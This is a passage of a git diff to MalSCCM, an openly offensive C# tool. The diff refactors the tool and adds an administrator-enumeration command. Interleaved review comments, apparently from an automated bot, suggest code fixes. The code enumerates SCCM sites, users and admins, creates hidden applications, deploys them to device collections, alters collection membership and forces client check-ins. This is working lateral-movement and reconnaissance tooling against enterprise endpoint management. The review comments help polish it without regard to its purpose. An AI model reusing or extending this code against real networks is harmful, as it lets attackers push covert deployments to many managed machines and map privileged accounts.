found for the command name + if (commandFound == false) + Info.ShowUsage(); + } + catch (Exception e) + { + Console.WriteLine("\r\n[!] Unhandled MalSCCM exception:\r\n"); + Console.WriteLine(e); + } + } - MainExecute(commandName, parsed.Arguments); + public static void Main(string[] args) + { + // try to parse the command line arguments, show usage on failure and then bail + var parsed = ArgumentParser.Parse(args); + if (parsed.ParsedOk == false) + { + Info.ShowLogo(); + Info.ShowUsage(); + return; } + + var commandName = args.Length != 0 ? args[0] : ""; + MainExecute(commandName, parsed.Arguments); } -} +} \ No newline at end of file diff --git a/MalSCCM/lib/Application.cs b/MalSCCM/lib/Application.cs index 61aa64e..a0da2df 100644 --- a/MalSCCM/lib/Application.cs 
+++ b/MalSCCM/lib/Application.cs @@ -1,21 +1,22 @@ using System; using System.Management; using System.Text; + using MalSCCM.Commands; -public class Application +public static class Application { public static bool FbCreateSCCMApplication() { try { - ManagementClass IDClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Identification"); - ManagementClass AppClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_Application"); + var IDClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_Identification"); + var AppClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_Application"); object[] methodArgs = {null}; - object result = IDClass.InvokeMethod("GetSiteID", methodArgs); - string scopeid = (string)methodArgs[0]; + var result = IDClass.InvokeMethod("GetSiteID", methodArgs); + var scopeid = (string)methodArgs[0]; var trimscopeid = "ScopeId_" + scopeid.Trim(new char[] { '{', '}' }); Console.WriteLine("ScopeID: " + trimscopeid); @@ -27,7 +28,7 @@ public static bool FbCreateSCCMApplication() var NewFileID = "File_" + Guid.NewGuid(); Console.WriteLine("NewFileID: " + NewFileID); - StringBuilder xml = new StringBuilder(); + var xml = new StringBuilder(); xml.AppendLine(@"" + App.AppName + @"" + App.AppName + @"" + App.AppName + @"GLOBAL/ScriptDeploymentTechnologyScriptNativeSystemLocalSystem<?xml version=""1.0"" encoding=""utf-16""?>"); xml.AppendLine(@"<EnhancedDetectionMethod xmlns=""http://schemas.microsoft.com/SystemCenterConfigurationManager/2009/AppMgmtDigest"">"); @@ -58,7 +59,7 @@ public static bool FbCreateSCCMApplication() Console.WriteLine("Creating Instance"); - ManagementObject newInstance = AppClass.CreateInstance(); + var newInstance = AppClass.CreateInstance(); newInstance["SDMPackageXML"] = xml.ToString(); newInstance["IsHidden"] = true; 
@@ -82,10 +83,10 @@ public static bool FbRemoveSCCMApplication() try { var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); - ManagementObjectCollection objColl = mgmtSrchr.Get(); + var objColl = mgmtSrchr.Get(); foreach (ManagementObject obj in objColl) { @@ -111,15 +112,15 @@ public static bool FbDeploySCCMApplication() { try { - ManagementClass AppAssignementClass = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ApplicationAssignment"); + var AppAssignementClass = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_ApplicationAssignment"); var TargetCollectionID = Group.TargetCollectionID; var Query = new SelectQuery($"Select * FROM SMS_Application WHERE LocalizedDisplayName = '{App.AppName}'"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); var CI_ID = ""; - int CI_IDint = 0; + var CI_IDint = 0; var CI_UniqueID = ""; foreach (var result in mgmtSrchr.Get()) @@ -131,7 +132,7 @@ public static bool FbDeploySCCMApplication() var Date = DateTime.Now.ToString("yyyyMMddHHmmss") + ".000000+***"; - ManagementObject newInstance = AppAssignementClass.CreateInstance(); + var newInstance = AppAssignementClass.CreateInstance(); newInstance["ApplicationName"] = App.AppName; newInstance["AssignmentName"] = App.AssignmentName; 
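Review bot: In the `@@ -82,10 +83,10 @@` hunk (`FbRemoveSCCMApplication`), the rewritten `var objColl = mgmtSrchr.Get();` still leaves the `ManagementObjectSearcher` and the returned `ManagementObjectCollection` undisposed, although both implement `IDisposable`. Since these declarations are being touched anyway, using declarations would release them when the method exits: `using var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query);` and `using var objColl = mgmtSrchr.Get();`. This assumes the `11` added in MalSCCM.csproj is the language version, which the stripped markup does not confirm. The same `mgmtSrchr.Get()` pattern appears in the `FbRemoveSCCMApplicationDeployment` hunk. The method bodies continue outside the hunks, so check that nothing later needs the objects after the method returns.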
@@ -177,10 +178,10 @@ public static bool FbRemoveSCCMApplicationDeployment() try { var Query = new SelectQuery("Select * FROM SMS_ApplicationAssignment WHERE ApplicationName = '" + App.AppName + "'"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, Query); - ManagementObjectCollection objColl = mgmtSrchr.Get(); + var objColl = mgmtSrchr.Get(); foreach (ManagementObject obj in objColl) { @@ -200,5 +201,4 @@ public static bool FbRemoveSCCMApplicationDeployment() return false; } } - } diff --git a/MalSCCM/lib/Check.cs b/MalSCCM/lib/Check.cs index a586681..bd173ca 100644 --- a/MalSCCM/lib/Check.cs +++ b/MalSCCM/lib/Check.cs @@ -1,20 +1,21 @@ using System; using System.Management; + using MalSCCM.Commands; -public class Check +public static class Check { public static bool FbSCCMDeviceCheckin() { try { - ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}:SMS_ClientOperation"); - ManagementBaseObject newInstance = Class.GetMethodParameters("InitiateClientOperation"); + var Class = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}:SMS_ClientOperation"); + var newInstance = Class.GetMethodParameters("InitiateClientOperation"); newInstance["Type"] = 8; newInstance["TargetCollectionID"] = Group.TargetCollectionID; - ManagementBaseObject result = Class.InvokeMethod("InitiateClientOperation",newInstance,null); + var result = Class.InvokeMethod("InitiateClientOperation",newInstance,null); Console.WriteLine("ReturnValue: " + result.GetPropertyValue("ReturnValue")); Console.WriteLine("OperationID: " + result.GetPropertyValue("OperationID")); 
@@ -22,7 +23,6 @@ public static bool FbSCCMDeviceCheckin() Console.WriteLine("Checkin succeeded."); return true; - } catch (Exception e) { @@ -32,5 +32,4 @@ public static bool FbSCCMDeviceCheckin() return false; } } - } diff --git a/MalSCCM/lib/Enum.cs b/MalSCCM/lib/Enum.cs index 5f06653..e40c5b0 100644 --- a/MalSCCM/lib/Enum.cs +++ b/MalSCCM/lib/Enum.cs @@ -1,16 +1,19 @@ using System; +using System.Linq; using System.Management; +using System.Runtime.Remoting.Metadata.W3cXsd2001; using Microsoft.Win32; + using MalSCCM.Commands; -public class Enum +public static class Enum { public static bool FbGetSiteScope() { try { var osQuery = new SelectQuery("SMS_Authority"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\ccm"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\ccm"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery); @@ -18,7 +21,6 @@ public static bool FbGetSiteScope() { var siteCode = result.GetPropertyValue("Name").ToString(); var managementServer = result.GetPropertyValue("CurrentManagementPoint").ToString(); - if (!string.IsNullOrEmpty(siteCode)) { @@ -41,12 +43,13 @@ public static bool FbGetSiteScope() return false; } } + public static bool FbGetSiteScope2() { try { var osQuery = new SelectQuery("SMS_ProviderLocation"); - var mgmtScope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms"); + var mgmtScope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms"); mgmtScope.Connect(); var mgmtSrchr = new ManagementObjectSearcher(mgmtScope, osQuery); 
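Review bot: The using block at the top of Enum.cs gains `using System.Runtime.Remoting.Metadata.W3cXsd2001;`, which no line in the visible Enum.cs hunks references; it looks like an accidental IDE auto-import and should be dropped. `using System.Linq;` is in the same position as far as these hunks show, so confirm that code outside them needs it before keeping it. Separately, a class named `Enum` next to `using System;` is easy to confuse with `System.Enum`; a one-line comment on the class explaining the name would help readers.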
@@ -74,12 +77,13 @@ public static bool FbGetSiteScope2() return false; } } + public static bool FbGetSiteScope3() { try { const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Mobile Client"; - string assignedsitecode = (string)Registry.GetValue(keyName, "AssignedSiteCode", "No assigned site found, is this machine managed by SCCM?"); + var assignedsitecode = (string)Registry.GetValue(keyName, "AssignedSiteCode", "No assigned site found, is this machine managed by SCCM?"); Console.WriteLine("SiteCode: " + assignedsitecode); Inspect.SiteCode = assignedsitecode; @@ -94,12 +98,13 @@ public static bool FbGetSiteScope3() return false; } } + public static bool FbGetSCCMComputer() { try { var Query = new SelectQuery("SMS_R_System"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -122,12 +127,13 @@ public static bool FbGetSCCMComputer() return false; } } + public static bool FbGetSCCMADForest() { try { var Query = new SelectQuery("SMS_ADForest"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); 
@@ -150,12 +156,13 @@ public static bool FbGetSCCMADForest() return false; } } + public static bool FbGetSCCMApplication() { try { var Query = new SelectQuery("SMS_Application"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -178,12 +185,13 @@ public static bool FbGetSCCMApplication() return false; } } + public static bool FbGetSCCMPackage() { try { var Query = new SelectQuery("SMS_Package"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -206,12 +214,13 @@ public static bool FbGetSCCMPackage() return false; } } + public static bool FbGetSCCMCollection() { try { var Query = new SelectQuery("SMS_Collection"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -245,7 +254,7 @@ public static bool FbGetSCCMPrimaryUser() try { var Query = new SelectQuery("SMS_UserMachineRelationship"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); 
@@ -273,12 +282,13 @@ public static bool FbGetSCCMPrimaryUser() return false; } } + public static bool FbGetSCCMDeployments() { try { var Query = new SelectQuery("SMS_ApplicationAssignment"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_{Inspect.SiteCode}"); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -306,16 +316,17 @@ public static bool FbGetSCCMDeployments() return false; } } + public static bool FbGetSCCMPrimaryServerRegKey() { try { const string keyName = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\DP"; - string mgmtServer = (string)Registry.GetValue(keyName, "ManagementPoints", "Management key not found, are you an SCCM client?"); - string siteServer = (string)Registry.GetValue(keyName, "SiteServer", "Key not found, are you on a management server?"); + var mgmtServer = (string)Registry.GetValue(keyName, "ManagementPoints", "Management key not found, are you an SCCM client?"); + var siteServer = (string)Registry.GetValue(keyName, "SiteServer", "Key not found, are you on a management server?"); const string keyNameID = @"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SMS\Identification"; - string siteServerID = (string)Registry.GetValue(keyNameID, "Site Server", "Key not found, are you on a management server?"); + var siteServerID = (string)Registry.GetValue(keyNameID, "Site Server", "Key not found, are you on a management server?"); Console.WriteLine("Management Server: {0}", mgmtServer); Console.WriteLine("Primary Server: {0}", siteServer); 
@@ -331,6 +342,41 @@ public static bool FbGetSCCMPrimaryServerRegKey() return false; } } + + public static bool FbGetSCCMAdmins() + { + try + { + var query = new SelectQuery("SMS_Admin"); + var scope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"); + scope.Connect(); + var searcher = new ManagementObjectSearcher(scope, query); + foreach (var result in searcher.Get()) + { + var logonName = result.GetPropertyValue("LogonName").ToString(); + var adminSid = result.GetPropertyValue("AdminSid").ToString(); + var roleNames = result.GetPropertyValue("RoleNames") as string[] ?? Array.Empty(); + var categoryNames = result.GetPropertyValue("CategoryNames") as string[] ?? Array.Empty(); + var collectionNames = result.GetPropertyValue("CollectionNames") as string[] ?? Array.Empty(); + + Console.WriteLine("UserName: {0}", logonName); + Console.WriteLine("SID: {0}", adminSid); + Console.WriteLine("Roles: {0}", string.Join(", ", roleNames)); + Console.WriteLine("Security Scopes: {0}", string.Join(", ", categoryNames)); + Console.WriteLine("Collections: {0}", string.Join(", ", collectionNames)); + Console.WriteLine(); + } + + return true; + } + catch (Exception e) + { + Console.WriteLine("\r\nFunction error - FbGetSCCMComputer."); + var stdErr = Console.Error; + stdErr.WriteLine($"Error Message: {e.Message}"); + return false; + } + } } diff --git a/MalSCCM/lib/Groups.cs b/MalSCCM/lib/Groups.cs index e5ca37c..baec6ec 100644 --- a/MalSCCM/lib/Groups.cs +++ b/MalSCCM/lib/Groups.cs 
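Review bot: The catch block of the new `FbGetSCCMAdmins` prints `"\r\nFunction error - FbGetSCCMComputer."`, a label copied from another method, so a failure here is attributed to the wrong function; it should read `Console.WriteLine("\r\nFunction error - FbGetSCCMAdmins.");`. Inside the loop, the `LogonName` and `AdminSid` lines call `.ToString()` on the property value without a null check, while the three array properties are guarded, so one record with a missing value throws and ends the whole listing through that catch. Writing `result.GetPropertyValue("LogonName")?.ToString() ?? string.Empty` would match the array handling. The method also has no doc comment; a `/// <summary>` saying that it prints the `SMS_Admin` instances of the configured site and returns false on any exception would record the contract.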
@@ -1,15 +1,16 @@ using System; using System.Management; + using MalSCCM.Commands; -public class Groups +public static class Groups { public static bool FbGetSCCMCollectionID() { try { var Query = new SelectQuery("SMS_Collection"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); @@ -47,12 +48,13 @@ public static bool FbGetSCCMCollectionID() return false; } } + public static bool FbNewSCCMCollection() { try { - ManagementClass Class = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection"); - ManagementObject newInstance = Class.CreateInstance(); + var Class = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection"); + var newInstance = Class.CreateInstance(); newInstance["Name"] = Group.GroupName; newInstance["OwnedByThisSite"] = "True"; @@ -84,15 +86,16 @@ public static bool FbNewSCCMCollection() return false; } } + public static bool FbRemoveSCCMCollection() { try { - ManagementObject objHostSetting = new ManagementObject(); - objHostSetting.Scope = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); + var objHostSetting = new ManagementObject(); + objHostSetting.Scope = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode); //define lookup query - string strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"; + var strQuery = @"SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"; objHostSetting.Path = new ManagementPath(strQuery); //delete the Managementobject 
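Review bot: The rewritten scope strings in Groups.cs mix an interpolated verbatim literal with concatenation, e.g. `$@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode`, while Application.cs and Enum.cs in the same commit write `$@"\\{Inspect.ServerName}\root\sms\site_{Inspect.SiteCode}"`. Moving `Inspect.SiteCode` into the interpolation, or building the path once in a small private helper, would keep the files consistent and leave one place to change. This applies to `FbGetSCCMCollectionID`, `FbNewSCCMCollection` and `FbRemoveSCCMCollection` here, and to the later Groups.cs hunks for `FbGetUserResourceID`, `FbAddUserToSCCMCollection` and `FbAddDeviceToSCCMCollection`.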
@@ -109,12 +112,13 @@ public static bool FbRemoveSCCMCollection() return false; } } + public static bool FbGetUserResourceID() { try { var Query = new SelectQuery("SMS_R_User"); - var SCCMNamespace = new ManagementScope($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode); + var SCCMNamespace = new ManagementScope($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode); SCCMNamespace.Connect(); var mgmtSrchr = new ManagementObjectSearcher(SCCMNamespace, Query); 
@@ -139,24 +143,25 @@ public static bool FbGetUserResourceID() return false; } } + public static bool FbAddUserToSCCMCollection() { try { - ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); - ManagementObject collQueryInstance = collQuery.CreateInstance(); + var collQuery = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); + var collQueryInstance = collQuery.CreateInstance(); collQueryInstance["QueryExpression"] = "Select * from SMS_R_User Where UniqueUserName='" + Group.UserName + "'"; collQueryInstance["RuleName"] = "Members of collection"; - ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); - ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule"); + var collInstance = new ManagementObject($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); + var inParams = collInstance.GetMethodParameters("AddMembershipRule"); Console.WriteLine("Commiting instance"); inParams.SetPropertyValue("collectionRule", collQueryInstance); - ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); + var outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); return true; } @@ -168,6 +173,7 @@ public static bool FbAddUserToSCCMCollection() return false; } } + // To Do public static bool FbRemoveUserFromSCCMCollection() { 
@@ -184,24 +190,25 @@ public static bool FbRemoveUserFromSCCMCollection() return false; } } + public static bool FbAddDeviceToSCCMCollection() { try { - ManagementClass collQuery = new ManagementClass($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); - ManagementObject collQueryInstance = collQuery.CreateInstance(); + var collQuery = new ManagementClass($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode, "SMS_CollectionRuleQuery", null); + var collQueryInstance = collQuery.CreateInstance(); collQueryInstance["QueryExpression"] = "Select * from SMS_R_System Where Name='" + Group.DeviceName + "'"; collQueryInstance["RuleName"] = "Members of collection"; - ManagementObject collInstance = new ManagementObject($"\\\\{Inspect.ServerName}\\root\\sms\\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); - ManagementBaseObject inParams = collInstance.GetMethodParameters("AddMembershipRule"); + var collInstance = new ManagementObject($@"\\{Inspect.ServerName}\root\sms\site_" + Inspect.SiteCode + ":SMS_Collection.CollectionID='" + Group.TargetCollectionID + "'"); + var inParams = collInstance.GetMethodParameters("AddMembershipRule"); Console.WriteLine("Commiting instance"); inParams.SetPropertyValue("collectionRule", collQueryInstance); - ManagementBaseObject outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); + var outParams = collInstance.InvokeMethod("AddMembershipRule", inParams, null); return true; } @@ -213,6 +220,7 @@ public static bool FbAddDeviceToSCCMCollection() return false; } } + // To Do public static bool FbRemoveDeviceFromSCCMCollection() { @@ -229,4 +237,4 @@ public static bool FbRemoveDeviceFromSCCMCollection() return false; } } -} +} \ No newline at end of file